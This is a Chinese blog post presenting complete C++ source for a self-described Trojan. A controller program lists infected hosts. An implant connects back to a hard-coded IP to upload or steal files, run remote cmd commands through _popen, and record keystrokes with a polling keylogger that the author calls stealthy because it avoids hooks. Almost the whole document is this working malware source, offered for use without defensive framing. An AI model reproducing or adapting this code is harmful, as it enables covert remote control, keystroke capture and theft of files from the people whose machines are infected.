【网络编程】Trojan源码 文件传输+远程cmd+键盘记录

Trojan可以实现三个功能,分别为文件传输,远程执行cmd,键盘记录。其中键盘记录功能没有利用hook函数,有较强的隐蔽性。

现在给出源码:


client:

// client.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"  
#include <winsock2.h>  
#include <cstdio>
#include <wincrypt.h>
#include <cstring>
#include <iostream>  
#include <string.h> 
#include<vector>
#include<time.h>
#define PORT 2345
#define BUFFER_SIZE 1024
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "shlwapi.lib")
#pragma comment(lib, "ws2_32.lib")   
#pragma comment(lib, "crypt32.lib")  

using namespace std;
unsigned char mac_mine[6] = { 0x40, 0xe2, 0x30, 0x68, 0x43, 0xa9 };		//我的mac地址 40-E2-30-68-43-A9
unsigned char ip_mine[16] = {"127.0.0.1" };						//我的ip  172.20.10.5
int num;
struct node
{
	sockaddr_in addrClient;
	SOCKET socketClient;
}host[1024];

//检测是否有新的主机连接
DWORD WINAPI ClientThread(LPVOID lpParameter)
{
	int len = sizeof(SOCKADDR);
	SOCKET socketClient;
	sockaddr_in addrClient;
	int id = 0;
	SOCKET socketSever = (SOCKET)lpParameter;
	while (true)
	{
		socketClient = accept(socketSever, (SOCKADDR *)&addrClient, &len);
		num++;
		host[num].addrClient=addrClient;
		host[num].socketClient = socketClient;
	}
}

//将断开连接的主机删除
void RemoveHost(int id)
{
	for (int i = id; i < num; i++)
	{
		host[i] = host[i + 1];
	}
	num--;
}
//检查是否有主机断开连接
void HostClear()
{
	for (int i = num; i >=1; i--)
	{
		int sendbuf = 0;
		int Result=send(host[i].socketClient, (char*)&sendbuf, sizeof(int), 0);
		if (Result == SOCKET_ERROR)
		{
			RemoveHost(i);
		}
	}
}
//刷新
void refresh()
{
	HostClear();
	cout << "受控主机数:" << num << endl;
	for (int i = 1; i <= num; i++)
	{
		cout << i << ".   ip:" << inet_ntoa(host[i].addrClient.sin_addr) << "   port:" << host[i].addrClient.sin_port << endl;
	}
}

int recvn(SOCKET s, char * recvbuf, unsigned int fixedlen)
{
	int iResult;
	int cnt = fixedlen; //剩余多少字节尚未接收 
	while (cnt > 0)
	{
		iResult = recv(s, recvbuf, cnt, 0);
		if (iResult < 0)
		{
			printf("error: %d\n", WSAGetLastError());
			return -1;
		}
		if (iResult == 0)//对方关闭连接,返回已接收到的小于fixedlen的字节数 
			return fixedlen - cnt;
		recvbuf += iResult;
		cnt -= iResult;
	}
	return fixedlen;
}
//远程执行cmd
void UseCmd(int id)
{
	SOCKET s = host[id].socketClient;
	char	buf[BUFFER_SIZE];
	char result[BUFFER_SIZE * 64];
	int  inputlen;
	getchar();
	while (1)
	{
		memset(buf, 0, sizeof(buf));
		memset(result, 0, sizeof(result));
		cout << "C:\\Socket\\Client>";
		cin.getline(buf, sizeof(buf)); 
		send(s, buf, BUFFER_SIZE, 0);
		if (buf[0] == 'e'&&buf[1] == 'x'&&buf[2] == 'i'&&buf[3] == 't')
		{
			cout << "The End." << endl;
			return ;
		}
		
		recvn(s, result, sizeof(result));
		printf(result);
	}
}



void GetFile(int id)
{
	SOCKET s = host[id].socketClient;
	char filename[BUFFER_SIZE];
	memset(filename, 0, sizeof(filename));
	cout << "输入文件名:";
	getchar();
	cin.getline(filename, sizeof(filename));
	send(s, filename, sizeof(filename), 0); 
	TCHAR name[BUFFER_SIZE];
	memset(name, 0, sizeof(name));
	for (int i = 0; filename[i]; i++)
	{
		name[i] = filename[i];
	}
	HANDLE hFile;
	DWORD count;
	hFile = CreateFile(
		name,	 // 文件名
		GENERIC_WRITE,          // 写入权限
		0,                      // 阻止其他进程访问
		NULL,                   // 子进程不可继承本句柄
		CREATE_ALWAYS,             // 仅不存在时创建新文件
		FILE_ATTRIBUTE_NORMAL,  // 普通文件
		NULL
		);
	unsigned int filelen;
	recvn(s, (char *)&filelen, sizeof(unsigned int));
	filelen = ntohl(filelen);
	unsigned int recvbuflen = min(filelen, BUFFER_SIZE);
	char recvbuf[BUFFER_SIZE];
	while (filelen > 0)
	{
		cout << filelen << endl;
		memset(recvbuf, 0, sizeof(recvbuf));
		unsigned int recvlen=recvn(s, recvbuf, recvbuflen);
		WriteFile(hFile, recvbuf, recvlen, &count, 0);
		filelen -= recvlen;
		recvbuflen = min(filelen, recvbuflen); 
	}
	CloseHandle(hFile);
	cout << "文件接收成功!" << endl;

}

void SendFile(int id)
{
	SOCKET  s = host[id].socketClient;
	char filename[BUFFER_SIZE];
	memset(filename, 0, sizeof(filename));
	cout << "输入文件名:";
	getchar();
	cin.getline(filename, sizeof(filename));
	send(s, filename, BUFFER_SIZE, 0);
	TCHAR name[BUFFER_SIZE];
	memset(name, 0, sizeof(name));
	for (int i = 0; filename[i]; i++)
	{
		name[i] = filename[i];
	}
	HANDLE hFile;
	hFile = CreateFile(
		name,
		GENERIC_READ,
		0,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL
		);
	DWORD dwBytesRead, dwBytesToRead;
	unsigned int filelen = GetFileSize(hFile, NULL);
	unsigned int filelen1 = htonl(filelen);
	send(s, (char*)&filelen1, sizeof(unsigned int), 0);
	char buf[BUFFER_SIZE*32];
	dwBytesToRead = filelen;
	dwBytesRead = 0;
	while (dwBytesToRead > 0)
	{
		cout << dwBytesToRead << endl;
		memset(buf, 0, sizeof(buf));
		ReadFile(hFile, buf, 1024, &dwBytesRead, NULL);
		if (dwBytesRead == 0)		break;
		dwBytesToRead -= dwBytesRead;
		send(s, buf, dwBytesRead, 0);
	}
	CloseHandle(hFile);
	cout << "文件传输成功!" << endl;
}

void KeyLogger(int id)
{
	SOCKET  s = host[id].socketClient;
	cout << "请输入记录时长:";
	int Time;
	cin >> Time;
	send(s, (char*)&Time, sizeof(int), 0);
	char filename[BUFFER_SIZE] = "KeyLogger.txt";
	TCHAR name[BUFFER_SIZE];
	for (int i = 0;i<BUFFER_SIZE; i++)
		name[i] = filename[i];
	HANDLE hFile;
	DWORD count;
	hFile = CreateFile(
		name,	 // 文件名
		GENERIC_WRITE,          // 写入权限
		0,                      // 阻止其他进程访问
		NULL,                   // 子进程不可继承本句柄
		CREATE_ALWAYS,             // 仅不存在时创建新文件
		FILE_ATTRIBUTE_NORMAL,  // 普通文件
		NULL
		);
	unsigned int filelen;
	recvn(s, (char *)&filelen, sizeof(unsigned int));
	filelen = ntohl(filelen);
	unsigned int recvbuflen = min(filelen, BUFFER_SIZE);
	char recvbuf[BUFFER_SIZE];
	cout << endl;
	while (filelen > 0)
	{
		cout << filelen << " ";
		memset(recvbuf, 0, sizeof(recvbuf));
		unsigned int recvlen = recvn(s, recvbuf, recvbuflen);
		cout << recvlen << endl;
		WriteFile(hFile, recvbuf, recvlen, &count, 0);
		filelen -= recvlen;
		recvbuflen = min(filelen, recvbuflen);
	}
	CloseHandle(hFile);
	cout << "文件接收成功!" << endl;
}

int _tmain(int argc, _TCHAR* argv[])
{
	WORD sockVersion = MAKEWORD(2, 2);
	WSADATA wsaData;
	int error = WSAStartup(sockVersion, &wsaData);
	if (error != 0)
	{
		cout << "fail to startup! " << WSAGetLastError() << endl;
		return 0;
	}
	SOCKET socketSever = socket(AF_INET, SOCK_STREAM, 0);
	if (socketSever == INVALID_SOCKET)
	{
		cout << "socket error! " << WSAGetLastError() << endl;
		WSACleanup();
		closesocket(socketSever);
		return 0;
	}

	//本机socket 地址
	sockaddr_in addrServer;
	addrServer.sin_addr.S_un.S_addr = htonl(INADDR_ANY);
	addrServer.sin_family = AF_INET;
	addrServer.sin_port = htons(PORT);
	//将socket绑定在本地端口
	if (bind(socketSever, (SOCKADDR*)&addrServer, sizeof(SOCKADDR)) == SOCKET_ERROR)
	{
		cout << "bind error! " << WSAGetLastError() << endl;;
		closesocket(socketSever);
		WSACleanup();
		return 0;
	}
	if (listen(socketSever, 10) == SOCKET_ERROR)
		cout << "Listen failed with error " << WSAGetLastError() << endl;

	num = 0;

	HANDLE hThread = NULL;
	hThread = CreateThread(NULL, 0, ClientThread, (LPVOID)socketSever, 0, NULL);
	
	refresh();
	while (1)
	{
		cout << "请选择操作" << endl;

		cout << "---------------------------------------------------"<<endl;
		cout << "|                    请输入选项                   |" << endl;
		cout << "|                    0.刷新主机                   |" << endl;
		cout << "|                    1.获取文件                   |" << endl;
		cout << "|                    2.发送文件                   |" << endl;
		cout << "|                    3.远程控制                   |" << endl;
		cout << "|                    4.键盘记录                   |" << endl;
		cout << "---------------------------------------------------" << endl;

		int choice;
		cin >> choice;
		if (choice == 0)
		{
			refresh();
		}
		else
		{
			cout << "选择受控主机编号: ";
			int id;
			cin >> id;
			send(host[id].socketClient, (char*)&choice, sizeof(int), 0);
			if (choice == 1)
			{
				GetFile(id);
			}
			if (choice == 2)
			{
				SendFile(id);
			}
			if (choice == 3)
			{
				UseCmd(id);
			}
			if (choice == 4)
			{
				KeyLogger(id);
			}
		}
	}
	CloseHandle(hThread);
	closesocket(socketSever);
	return 0;
}


server:

// server.cpp : 定义控制台应用程序的入口点。
//

#include "stdafx.h"  
#include <winsock2.h>  
#include <cstdio>
#include <wincrypt.h>
#include <time.h>
#include <cstring>
#include <iostream>  
#include <string.h> 
#define PORT 2345
#define BUFFER_SIZE 1024
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "shlwapi.lib")
#pragma comment(lib, "ws2_32.lib")   
#pragma comment(lib, "crypt32.lib")  

using namespace std;

char IP[16] = { "127.0.0.1" };
char *LowerCase[] = {
	"b",
	"e",
	"[ESC]",
	"[F1]",
	"[F2]",
	"[F3]",
	"[F4]",
	"[F5]",
	"[F6]",
	"[F7]",
	"[F8]",
	"[F9]",
	"[F10]",
	"[F11]",
	"[F12]",
	"`",
	"1",
	"2",
	"3",
	"4",
	"5",
	"6",
	"7",
	"8",
	"9",
	"0",
	"-",
	"=",
	"[TAB]",
	"q",
	"w",
	"e",
	"r",
	"t",
	"y",
	"u",
	"i",
	"o",
	"p",
	"[",
	"]",
	"a",
	"s",
	"d",
	"f",
	"g",
	"h",
	"j",
	"k",
	"l",
	";",
	"'",
	"z",
	"x",
	"c",
	"v",
	"b",
	"n",
	"m",
	",",
	".",
	"/",
	"\\",
	"[CTRL]",
	"[WIN]",
	" ",
	"[WIN]",
	"[Print Screen]",
	"[Scroll Lock]",
	"[Insert]",
	"[Home]",
	"[PageUp]",
	"[Del]",
	"[End]",
	"[PageDown]",
	"[Left]",
	"[UP]",
	"[Right]",
	"[Down]",
	"[Num Lock]",
	"/",
	"*",
	"-",
	"+",
	"0",
	"1",
	"2",
	"3",
	"4",
	"5",
	"6",
	"7",
	"8",
	"9",
	".",
};
// Upper Case Key & Some Other Keys
char *UpperCase[] = {
	"b",
	"e",
	"[ESC]",
	"[F1]",
	"[F2]",
	"[F3]",
	"[F4]",
	"[F5]",
	"[F6]",
	"[F7]",
	"[F8]",
	"[F9]",
	"[F10]",
	"[F11]",
	"[F12]",
	"~",
	"!",
	"@",
	"#",
	"$",
	"%",
	"^",
	"&",
	"*",
	"(",
	")",
	"_",
	"+",
	"[TAB]",
	"Q",
	"W",
	"E",
	"R",
	"T",
	"Y",
	"U",
	"I",
	"O",
	"P",
	"{",
	"}",
	"A",
	"S",
	"D",
	"F",
	"G",
	"H",
	"J",
	"K",
	"L",
	":",
	"\"",
	"Z",
	"X",
	"C",
	"V",
	"B",
	"N",
	"M",
	"<",
	">",
	".?",
	"│",
	"[CTRL]",
	"[WIN]",
	" ",
	"[WIN]",
	"[Print Screen]",
	"[Scroll Lock]",
	"[Insert]",
	"[Home]",
	"[PageUp]",
	"[Del]",
	"[End]",
	"[PageDown]",
	"[Left]",
	"[Up]",
	"[Right]",
	"[Down]",
	"[Num Lock]",
	"/",

	"*",
	"-",
	"+",
	"0",
	"1",
	"2",
	"3",
	"4",
	"5",
	"6",
	"7",
	"8",
	"9",
	".",
};
// Ascii Keys,Forget About It
int SpecialKeys[] = {
	8,
	13,
	27,
	112,
	113,
	114,
	115,
	116,
	117,
	118,
	119,
	120,
	121,
	122,
	123,
	192,
	49,
	50,
	51,
	52,
	53,
	54,
	55,
	56,
	57,
	48,
	189,
	187,
	9,
	81,
	87,
	69,
	82,
	84,
	89,
	85,
	73,
	79,
	80,
	219,
	221,
	65,
	83,
	68,
	70,
	71,
	72,
	74,
	75,
	76,
	186,
	222,
	90,
	88,
	67,
	86,
	66,
	78,
	77,
	188,
	190,
	191,
	220,
	17,
	91,
	32,
	92,
	44,
	145,
	45,
	36,
	33,
	46,
	35,
	34,
	37,
	38,
	39,
	40,
	144,
	111,
	106,
	109,
	107,
	96,
	97,
	98,
	99,
	100,
	101,
	102,
	103,
	104,
	105,
	110,
};
HWND PreviousFocus = NULL;

int recvn(SOCKET s, char * recvbuf, unsigned int fixedlen)
{
	int iResult;
	int cnt = fixedlen; //剩余多少字节尚未接收 
	while (cnt > 0)
	{
		iResult = recv(s, recvbuf, cnt, 0);
		if (iResult < 0)
		{
			printf("error: %d\n", WSAGetLastError());
			return -1;
		}
		if (iResult == 0)//对方关闭连接,返回已接收到的小于fixedlen的字节数 
			return fixedlen - cnt;
		recvbuf += iResult;
		cnt -= iResult;
	}
	return fixedlen;
}

void SendFile(SOCKET s)
{
	char filename[BUFFER_SIZE];
	memset(filename, 0, sizeof(filename));
	recvn(s, filename, BUFFER_SIZE); cout << filename << endl;
	TCHAR name[BUFFER_SIZE];
	memset(name, 0, sizeof(name));
	for (int i = 0; filename[i]; i++)
		name[i] = filename[i];
	HANDLE hFile;
	hFile = CreateFile(
		name,
		GENERIC_READ,
		0,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL
		);
	DWORD dwBytesRead, dwBytesToRead;
	unsigned int filelen = GetFileSize(hFile, NULL);
	unsigned int filelen1 = htonl(filelen);
	send(s, (char*)&filelen1, sizeof(unsigned int), 0);
	char buf[BUFFER_SIZE * 32];
	dwBytesToRead = filelen;
	dwBytesRead = 0;
	while (dwBytesToRead > 0)
	{
		cout << dwBytesToRead << endl;
		memset(buf, 0, sizeof(buf));
		ReadFile(hFile, buf, 1024, &dwBytesRead, NULL);
		if (dwBytesRead == 0)		break;
		dwBytesToRead -= dwBytesRead;
		send(s, buf, dwBytesRead, 0); 
	}
	CloseHandle(hFile);
}

void GetFile(SOCKET s)
{
	char filename[BUFFER_SIZE];
	memset(filename, 0, sizeof(filename));
	recvn(s, filename, BUFFER_SIZE);
	TCHAR name[BUFFER_SIZE];
	memset(name, 0, sizeof(name));
	for (int i = 0; filename[i]; i++)
	{
		name[i] = filename[i];
	}
	HANDLE hFile;
	DWORD count;
	hFile = CreateFile(
		name,	 // 文件名
		GENERIC_WRITE,          // 写入权限
		0,                      // 阻止其他进程访问
		NULL,                   // 子进程不可继承本句柄
		CREATE_ALWAYS,             // 仅不存在时创建新文件
		FILE_ATTRIBUTE_NORMAL,  // 普通文件
		NULL
		);
	unsigned int filelen;
	recvn(s, (char *)&filelen, sizeof(unsigned int));
	filelen = ntohl(filelen);
	unsigned int recvbuflen = min(filelen, BUFFER_SIZE);
	char recvbuf[BUFFER_SIZE];
	while (filelen > 0)
	{
		cout << filelen << endl;
		memset(recvbuf, 0, sizeof(recvbuf));
		unsigned int recvlen = recvn(s, recvbuf, recvbuflen);
		WriteFile(hFile, recvbuf, recvlen, &count, 0);
		filelen -= recvlen;
		recvbuflen = min(filelen, recvbuflen);
	}
	CloseHandle(hFile);
	cout << "文件接收成功!" << endl;

}

int execmd(char* cmd, char* result) {
	char buffer[BUFFER_SIZE];                         //定义缓冲区                        
	FILE* pipe = _popen(cmd, "r");            //打开管道,并执行命令 
	if (!pipe)
		return 0;                      //返回0表示运行失败 
	
	while (!feof(pipe)) {
		if (fgets(buffer, BUFFER_SIZE, pipe)){             //将管道输出到result中 
			strcat(result, buffer);
		}
	}
	_pclose(pipe);                            //关闭管道 
	return 1;                                 //返回1表示运行成功 
}


void UseCmd(SOCKET s)
{
	char buf[BUFFER_SIZE];
	char result[BUFFER_SIZE * 64]; 
	while (1)
	{
		memset(buf, 0, sizeof(buf));
		memset(result, 0, sizeof(result));
		recvn(s, buf, BUFFER_SIZE); 
		if (buf[0] == 'e'&&buf[1] == 'x'&&buf[2] == 'i'&&buf[3] == 't')
		{
			return;
		}
		execmd(buf, result); 
		send(s, result, sizeof(result),0);
	}
	
}
char *WindowCaption = (char*)malloc(sizeof(char)* (100 + 2)); // Allocate Memory For The Caption
BOOL IsWindowsFocusChange()
{
	HWND hFocus = GetForegroundWindow(); // Retrieve The Active Windows's Focus
	BOOL ReturnFlag = FALSE; // Declare The Return Flag
	if (hFocus != PreviousFocus) // The Active Windows Has Change
	{
		PreviousFocus = hFocus; // Save The Old Active Windos Focus
		int WinLeng = GetWindowTextLength(hFocus); // Get The Active Windows's Caption's Length
		memset(WindowCaption, 0, sizeof(WindowCaption));
		//char *WindowCaption = (char*)malloc(sizeof(char)* (WinLeng + 2)); // Allocate Memory For The Caption
		//char WindowCaption[52];
		GetWindowText(hFocus, (LPWSTR)WindowCaption, (WinLeng + 1)); // Retrieve The Active Windows's Caption
		if (WindowCaption != NULL&&strlen(WindowCaption) > 0) // Really Get The Windows's Caption
		{
			//printf("rnThe Active Windows Title: %srn", WindowCaption); // Display The Active Windows's Caption
			ReturnFlag = TRUE; // Indicate The Windows's Focus Has Changed
		}
		//free(WindowCaption); // Free The Allocated Memory
	} 
	return ReturnFlag; // Return The Flag
}// End Of IsWindowsFocusChange Function
//-------------------------------------------------------------------------
// Purpose: To Manage(Display)The Keys Retrieved From System's Key Buffer
// Return Type: Boolean
// Parameters: NULL
//-------------------------------------------------------------------------
BOOL KeyLogger(int Time)
{
	Time *= 125;
	int bKstate[256] = { 0 }; // Declare The Key State Array
	int i, x;
	char KeyBuffer[600]; // Key Buffer Array
	int state; // Variable To Hode State Of Some Special Key Like CapsLock,Shift And ect
	int shift; // Variable To Hode State Of Shift Key
	// Reset The Buffer
	memset(KeyBuffer, 0, sizeof(KeyBuffer));
	char filename[1024] = { "out.txt" };
	TCHAR name[1024];
	for (int i = 0; i < 1024; i++)
		name[i] = filename[i];
	HANDLE hFile;
	DWORD count;
	hFile = CreateFile(
		name,	 // 文件名
		GENERIC_WRITE,          // 写入权限
		0,                      // 阻止其他进程访问
		NULL,                   // 子进程不可继承本句柄
		CREATE_ALWAYS,             // 仅不存在时创建新文件
		FILE_ATTRIBUTE_NORMAL,  // 普通文件
		NULL
		);
	DWORD cnt;

	while (Time--) // Forever Loop Is Taking Place Here
	{
		Sleep(8); // Rest For A While,And Avoid Taking 100% CPU Usage.Pretty Important To Add This Line Or The System Gets Fucked UP
		if (IsWindowsFocusChange()) //Check The Active Windows Title
		{
			if (strlen(KeyBuffer) != 0) // Keys Are Pressed
			{
				//printf("%s", KeyBuffer); // Display The Keys Pressed
				WriteFile(hFile, KeyBuffer, 600, &cnt, 0);
				memset(KeyBuffer, 0, sizeof(KeyBuffer)); // reset The Buffer
			}
		}
		for (i = 0; i<92; i++) // Looping To Check Visual Keys
		{
			shift = GetKeyState(VK_SHIFT); // Check Whether Shift Is Pressed
			x = SpecialKeys[i]; // Match The Key
			if (GetAsyncKeyState(x) & 0x8000) // Check Combination Keys
			{
				// See Whether CapsLocak Or Shift Is Pressed
				if (((GetKeyState(VK_CAPITAL) != 0) && (shift > -1) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Not Pressed

				{
					bKstate[x] = 1; //Uppercase Characters A-Z
				}
				else
				if (((GetKeyState(VK_CAPITAL) != 0) && (shift < 0) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Pressed
				{
					bKstate[x] = 2; //Lowercase a-z
				}
				else
				if (shift < 0) // Shift Is Pressed
				{
					bKstate[x] = 3; //Uppercase Characters A-Z
				}
				else
					bKstate[x] = 4; //Lowercase a-z
			}
			else
			{
				if (bKstate[x] != 0) // No Combination Keys Detected
				{
					state = bKstate[x]; // Retrieve The Current State
					bKstate[x] = 0; // Reset The Current State
					if (x == 8) // Back Space Is Detected
					{
						KeyBuffer[strlen(KeyBuffer) - 1] = 0; // One Key Back Then
						continue; // Start A New Loop
					}
					else
					if (strlen(KeyBuffer) > 550) // Buffer FULL
					{
						//printf("%s <Buffer Full>", KeyBuffer); // Display The Keys Retrieved
						WriteFile(hFile, KeyBuffer, 600, &cnt, 0);
						memset(KeyBuffer, 0, sizeof(KeyBuffer)); // Reset The Buffer
						continue; // Start A New Loop
					}
					else
					if (x == 13) // Enter Is Detected
					{
						if (strlen(KeyBuffer) == 0) // No Other Keys Retrieved But Enter
						{
							continue; // Start A New Loop
						}
						//printf("%s<Enter>", KeyBuffer); // Retrieve Other Keys With Enter
						WriteFile(hFile, KeyBuffer, 600, &cnt, 0);
						memset(KeyBuffer, 0, sizeof(KeyBuffer)); // Display The Keys With Enter
						continue; // Start A New Loop
					}
					else
					if ((state % 2) == 1) //Must Be Upper Case Characters
					{
						strcat(KeyBuffer, UpperCase[i]); // Store The Key To Key Buffer
					}
					else
					if ((state % 2) == 0) // Must Be Lower Case Characters
					{
						strcat(KeyBuffer, LowerCase[i]); // Store The Key To Key Buffer
					}
				}
			}
		}// End Of For Loop
	}// End Of While Loop
	CloseHandle(hFile);
	return TRUE; // Return To The Caller
}// End Of KeyLogger Function
// End Of File

void UseKeyLogger(SOCKET s)
{
	int Time;
	recv(s, (char*)&Time, sizeof(int), 0);
	KeyLogger(Time);
	char filename[BUFFER_SIZE] = "out.txt";
	TCHAR name[BUFFER_SIZE];
	memset(name, 0, sizeof(name));
	for (int i = 0; filename[i]; i++)
		name[i] = filename[i];
	HANDLE hFile;
	hFile = CreateFile(
		name,
		GENERIC_READ,
		0,
		NULL,
		OPEN_EXISTING,
		FILE_ATTRIBUTE_NORMAL,
		NULL
		);
	DWORD dwBytesRead, dwBytesToRead;
	unsigned int filelen = GetFileSize(hFile, NULL);
	unsigned int filelen1 = htonl(filelen);
	send(s, (char*)&filelen1, sizeof(unsigned int), 0);
	char buf[BUFFER_SIZE * 32];
	dwBytesToRead = filelen;
	dwBytesRead = 0;
	while (dwBytesToRead > 0)
	{
		cout << dwBytesToRead << endl;
		memset(buf, 0, sizeof(buf));
		ReadFile(hFile, buf, 1024, &dwBytesRead, NULL);
		if (dwBytesRead == 0)		break;
		dwBytesToRead -= dwBytesRead;
		send(s, buf, dwBytesRead, 0);
	}
	CloseHandle(hFile);
}

int _tmain(int argc, _TCHAR* argv[])
{
	WORD sockVersion = MAKEWORD(2, 2);
	WSADATA wsaData;
	int error = WSAStartup(sockVersion, &wsaData);
	if (error)
	{
		cout << "fail to startup" << GetLastError() << endl;
		WSACleanup();
		return -1;
	}
	SOCKET socketClient = socket(AF_INET, SOCK_STREAM, 0);
	if (socketClient == INVALID_SOCKET)
	{
		cout << "socket error!  " << GetLastError() << endl;
		WSACleanup();
		closesocket(socketClient);
		return -1;
	}

	sockaddr_in addrServer;
	addrServer.sin_addr.S_un.S_addr = inet_addr(IP);
	addrServer.sin_family = AF_INET;
	addrServer.sin_port = htons(PORT);
	connect(socketClient, (SOCKADDR*)&addrServer, sizeof(SOCKADDR));
	int op;
	while (1)
	{
		recvn(socketClient, (char*)&op, sizeof(int)); 
		if (op == 1)
		{
			SendFile(socketClient);
		}
		if (op == 2)
		{
			GetFile(socketClient);
		}
		if (op == 3)
		{
			UseCmd(socketClient);
		}
		if (op == 4)
		{
			UseKeyLogger(socketClient);
		}
	}
	closesocket(socketClient);
	return 0;
}






版权声明:本文为zchahaha原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。